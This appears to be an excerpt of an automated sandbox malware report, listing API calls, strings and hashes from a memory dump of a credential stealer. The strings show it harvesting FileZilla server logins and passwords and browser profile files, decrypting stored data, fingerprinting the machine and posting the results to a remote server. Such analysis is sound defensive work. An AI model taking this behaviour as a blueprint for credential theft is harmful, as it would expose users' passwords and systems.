                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: memset$H_prologlstrcpywsprintf$Drivelstrcat$FileFindFirstLogicalStringsTypelstrlenstrtok_s
                                                                                    • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
                                                                                    • API String ID: 2879972474-147700698
                                                                                    • Opcode ID: e50e932db34735ec1e1f7d5ed1c1354268d54e004d92e1bad43fc9aee28c9db4
                                                                                    • Instruction ID: 4715bdd0870850b2207078c54e98d1efd7a256ad646b0eee288a0e2f42291a72
                                                                                    • Opcode Fuzzy Hash: e50e932db34735ec1e1f7d5ed1c1354268d54e004d92e1bad43fc9aee28c9db4
                                                                                    • Instruction Fuzzy Hash: 095170B190029CEADF30EF61DC55EEF7B7DAF05304F50003ABA15A2191DB386A89CB95
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00401167
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00422374,?,?,?,00422370,?,?,00000000,?,00000000), ref: 004013AC
                                                                                    • StrCmpCA.SHLWAPI(?,00422378), ref: 004013CA
                                                                                    • StrCmpCA.SHLWAPI(?,0042237C), ref: 004013E4
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,?,?,?,00422388,?,?,?,00422384,?,?,?,00422380,?,?), ref: 00401510
                                                                                      • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,;\B,00000000,00000000,?), ref: 00410D52
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                      • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426440,00000001,000000C8,00000000,00426562), ref: 00410BA1
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                      • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                      • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                      • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                      • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                      • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                    • FindNextFileA.KERNEL32(00000000,?,?,?,?,?,?,0042238C), ref: 00401832
                                                                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,0042238C), ref: 00401841
                                                                                    • FindNextFileA.KERNEL32(?,?), ref: 00401BD4
                                                                                    • FindClose.KERNEL32(?), ref: 00401BE5
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                      • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                      • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                      • Part of subcall function 00410CDD: _EH_prolog.MSVCRT ref: 00410CE2
                                                                                      • Part of subcall function 00410CDD: GetFileAttributesA.KERNEL32(00000000,?,0040BAC2,?,00425BF6,?,?), ref: 00410CF6
                                                                                      • Part of subcall function 0040618B: LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406216
                                                                                      • Part of subcall function 00414437: Sleep.KERNEL32(000003E8,?,?,?,?,?,00000000), ref: 004144C0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileH_prolog$Find$lstrcpy$Close$CreateFirstLocalNextlstrcat$AllocAttributesFolderFreeHandleObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
                                                                                    • String ID: 7$\*.*
                                                                                    • API String ID: 40499504-4165053604
                                                                                    • Opcode ID: 2415c5a552409a1327100fa76e5c65bacbb48c19f6e4dd66bfc40bef1be4ee54
                                                                                    • Instruction ID: 8097af2253b6e43ffd1ff437b79a581fef85e219c3474a36129b1183f2ad689d
                                                                                    • Opcode Fuzzy Hash: 2415c5a552409a1327100fa76e5c65bacbb48c19f6e4dd66bfc40bef1be4ee54
                                                                                    • Instruction Fuzzy Hash: 04624D70904188EADB15EBE5C955BDDBBB8AF29308F5040BEA509735C2DF781B4CCB25
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040B468
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,00425F10,?,?,00425BEF,?,00000000,?), ref: 0040B4E7
                                                                                    • StrCmpCA.SHLWAPI(?,00425F14,?,00000000,?), ref: 0040B50B
                                                                                    • StrCmpCA.SHLWAPI(?,00425F18,?,00000000,?), ref: 0040B525
                                                                                    • StrCmpCA.SHLWAPI(?,prefs.js,00000000,?,?,?,00425F1C,?,?,00425BF2,?,00000000,?), ref: 0040B5C1
                                                                                      • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                      • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426440,00000001,000000C8,00000000,00426562), ref: 00410BA1
                                                                                    • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,00425F2C,?,?,00000000,00425BF3,?,00000000,?), ref: 0040B6C6
                                                                                    • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040B79B
                                                                                    • FindNextFileA.KERNELBASE(?,?,?,00000000,?), ref: 0040B84A
                                                                                    • FindClose.KERNEL32(?,?,00000000,?), ref: 0040B85B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileH_prologlstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
                                                                                    • String ID: prefs.js
                                                                                    • API String ID: 2318033617-3783873740
                                                                                    • Opcode ID: 5d5855e90322f171bdcc3e902ad36419314a4be2ab95842e86b6b9ed6f14b737
                                                                                    • Instruction ID: ee987ab292ce5c8f0602a9b5561e4dc2d57f8a603593be12f89c118a2121006c
                                                                                    • Opcode Fuzzy Hash: 5d5855e90322f171bdcc3e902ad36419314a4be2ab95842e86b6b9ed6f14b737
                                                                                    • Instruction Fuzzy Hash: D5D18471900248EADB14EBE5C956BDDBBB4AF19304F5040BEE409B36C2DB785B4CCB66
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004094EA
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,00425DC4,?,?,00425BA2,?), ref: 00409567
                                                                                    • StrCmpCA.SHLWAPI(?,00425DC8), ref: 00409584
                                                                                    • StrCmpCA.SHLWAPI(?,00425DCC), ref: 0040959E
                                                                                    • StrCmpCA.SHLWAPI(?,00000000,?,?,?,00425DD0,?,?,00425BA3), ref: 00409635
                                                                                    • StrCmpCA.SHLWAPI(?), ref: 004096B6
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 00408759: _EH_prolog.MSVCRT ref: 0040875E
                                                                                      • Part of subcall function 00408759: CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,?,00425D70,?,?,?,00425B92,00000000), ref: 00408841
                                                                                    • FindNextFileA.KERNELBASE(00000000,?), ref: 0040989F
                                                                                    • FindClose.KERNEL32(00000000), ref: 004098AE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prologlstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 322284088-0
                                                                                    • Opcode ID: c7d6cc988ba782d8cbd6a4dc9e280d496fe71cb906df9d5859f326619e4a8ed7
                                                                                    • Instruction ID: 4c01649d4d81a67c5449674785cae23a0a495e6994ebb05e8901edf346d892d0
                                                                                    • Opcode Fuzzy Hash: c7d6cc988ba782d8cbd6a4dc9e280d496fe71cb906df9d5859f326619e4a8ed7
                                                                                    • Instruction Fuzzy Hash: 23C17270900249EADF10EBA5C9167DDBFB8AF09304F10417EE844B36C2DB785B08CBA6
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040FCEA
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    • GetKeyboardLayoutList.USER32(00000000,00000000,00426257,00000001,?,00000000), ref: 0040FD1C
                                                                                    • LocalAlloc.KERNEL32(00000040,00000000,?,00000000), ref: 0040FD2A
                                                                                    • GetKeyboardLayoutList.USER32(00000000,00000000,?,00000000), ref: 0040FD35
                                                                                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000000), ref: 0040FD5F
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • LocalFree.KERNEL32(?), ref: 0040FE03
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: lstrcpy$H_prologKeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
                                                                                    • String ID: /
                                                                                    • API String ID: 2868853201-4001269591
                                                                                    • Opcode ID: 2eab95dacd1e64dbfb91623fc5bd3e6636dc749e560b48b740839b7e56384bd9
                                                                                    • Instruction ID: 9e35c1e063a1b5006514c6e45779cb792778230f9907b47db8c95fc1ce32a63e
                                                                                    • Opcode Fuzzy Hash: 2eab95dacd1e64dbfb91623fc5bd3e6636dc749e560b48b740839b7e56384bd9
                                                                                    • Instruction Fuzzy Hash: 5831EDB1901119EFDB10EFE5D885AEEB7B9EF48304F54407EE509B3681C7785A88CB64
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004106C9
                                                                                    • CoCreateInstance.OLE32(00426D04,00000000,00000001,00426430,?,00000001,00000000,00000000,00000001,?,00000000), ref: 004106F0
                                                                                    • SysAllocString.OLEAUT32(?), ref: 004106FD
                                                                                    • _wtoi64.MSVCRT ref: 00410738
                                                                                    • SysFreeString.OLEAUT32(?), ref: 0041074B
                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00410752
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: String$Free$AllocCreateH_prologInstance_wtoi64
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004111C3
                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004111E9
                                                                                    • Process32First.KERNEL32(00000000,00000128), ref: 004111F9
                                                                                    • Process32Next.KERNEL32(00000000,00000128), ref: 0041120B
                                                                                    • StrCmpCA.SHLWAPI(?,?,?,?,00000000), ref: 0041121F
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 00411232
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • API ID: Process32$CloseCreateFirstH_prologHandleNextSnapshotToolhelp32
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,Computer Name: ,00000000,?,004265FC,00000000,?,00000000,00000000,?,AV: ), ref: 0040FCA3
                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,004265FC,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040FCAA
                                                                                    • GetTimeZoneInformation.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,004265FC,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040FCB9
                                                                                    • wsprintfA.USER32 ref: 0040FCD7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                    APIs
                                                                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004062C8
                                                                                    • LocalAlloc.KERNEL32(00000040,?,?), ref: 004062E0
                                                                                    • LocalFree.KERNEL32(?), ref: 004062FE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00417274,0042656F), ref: 0040FBD7
                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,00417274,0042656F), ref: 0040FBDE
                                                                                    • GetUserNameA.ADVAPI32(00000000,?), ref: 0040FBF2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • API ID: Heap$AllocNameProcessUser
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • API ID: InfoSystemwsprintf

                                                                                    Control-flow Graph (entry block 4043ad-4044ac; legend: Executed / Not Executed)
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004043B2
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                                      • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                                      • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00404421
                                                                                      • Part of subcall function 00410DAC: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 00410DD0
                                                                                      • Part of subcall function 00410DAC: GetProcessHeap.KERNEL32(00000000,?,?,00404415,?,?,?,?,?,?), ref: 00410DDD
                                                                                      • Part of subcall function 00410DAC: HeapAlloc.KERNEL32(00000000,?,00404415,?,?,?,?,?,?), ref: 00410DE4
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    • StrCmpCA.SHLWAPI(?,00425987,00425983,0042597B,00425977,00425976), ref: 004044A4
                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004044C4
                                                                                    • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004045E9
                                                                                    • HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 00404623
                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404647
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                    • lstrlenA.KERNEL32(00000000,00000000,?,",00000000,?,file_data,00000000,?,00000000,?,00425A40,00000000,?,?,00000000), ref: 00404B42
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00404B54
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404B66
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00404B6D
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00404B7F
                                                                                    • memcpy.MSVCRT ref: 00404B92
                                                                                    • lstrlenA.KERNEL32(00000000,?,?), ref: 00404BA9
                                                                                    • memcpy.MSVCRT ref: 00404BB3
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00404BC4
                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404BDD
                                                                                    • memcpy.MSVCRT ref: 00404BEA
                                                                                    • lstrlenA.KERNEL32(00000000,?,00000000), ref: 00404BFF
                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404C10
                                                                                    • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00404C37
                                                                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404CB9
                                                                                    • StrCmpCA.SHLWAPI(00000000,block), ref: 00404CD1
                                                                                    • ExitProcess.KERNEL32 ref: 00404CDC
                                                                                    • InternetCloseHandle.WININET(?), ref: 00404CEC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrlen$Internet$lstrcpy$H_prologHeap$HttpProcessmemcpy$AllocOpenRequestlstrcat$BinaryCloseConnectCrackCryptExitFileHandleInfoOptionQueryReadSendString
                                                                                    • String ID: ------$"$"$"$"$--$------$------$------$------$/$ERROR$ERROR$block$build_id$file_data
                                                                                    • API String ID: 2658035217-3274521816
                                                                                    • Opcode ID: 55ed085d277c474f36801abdb5871a2e9711e2d2595ca9f7e5e1cdb52fd56dac
                                                                                    • Instruction ID: 11be5296a5fba78ccfa74642cc821248e7657d66928f859353594ff17aad1918
                                                                                    • Opcode Fuzzy Hash: 55ed085d277c474f36801abdb5871a2e9711e2d2595ca9f7e5e1cdb52fd56dac
                                                                                    • Instruction Fuzzy Hash: 90624EB190014DEADB11EBE0C956BEEBBB8AF18308F50417EE505735C2DA786B4CCB65

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040BBED
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,;\B,00000000,00000000,?), ref: 00410D52
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                      • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                      • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                      • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                      • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                      • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                      • Part of subcall function 00410D6D: LocalAlloc.KERNEL32(00000040,004131CC,000000C8,00000001,?,004131CB,00000000,00000000), ref: 00410D86
                                                                                    • strtok_s.MSVCRT ref: 0040BCCB
                                                                                    • GetProcessHeap.KERNEL32(00000000,000F423F,00425C43,00425C42,00425C3F,00425C3E), ref: 0040BD1F
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040BD26
                                                                                    • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040BD3A
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040BD45
                                                                                    • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040BD7D
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040BD88
                                                                                    • StrStrA.SHLWAPI(00000000,<User>), ref: 0040BDC6
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040BDD1
                                                                                    • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040BE0F
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040BE1E
                                                                                    • lstrlenA.KERNEL32(?), ref: 0040C019
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                      • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                      • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                    • memset.MSVCRT ref: 0040C06C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prologlstrlen$lstrcpy$AllocFile$CreateHeapLocallstrcat$CloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitmemsetstrtok_s
                                                                                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
                                                                                    • API String ID: 486015307-935134978
                                                                                    • Opcode ID: 485589696674899ee60d382fb0c3e7a903a8895ba891ae23780a1d8ef705ae23
                                                                                    • Instruction ID: 75576aa526d99454559884b64ef79bc970659b381021a5103b73b201e8ee831e
                                                                                    • Opcode Fuzzy Hash: 485589696674899ee60d382fb0c3e7a903a8895ba891ae23780a1d8ef705ae23
                                                                                    • Instruction Fuzzy Hash: 3AE16C71900258EADB15EBE1DC56FEEBB78AF19304F50047AF505B21D2EF781A08CB69

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040E7BD
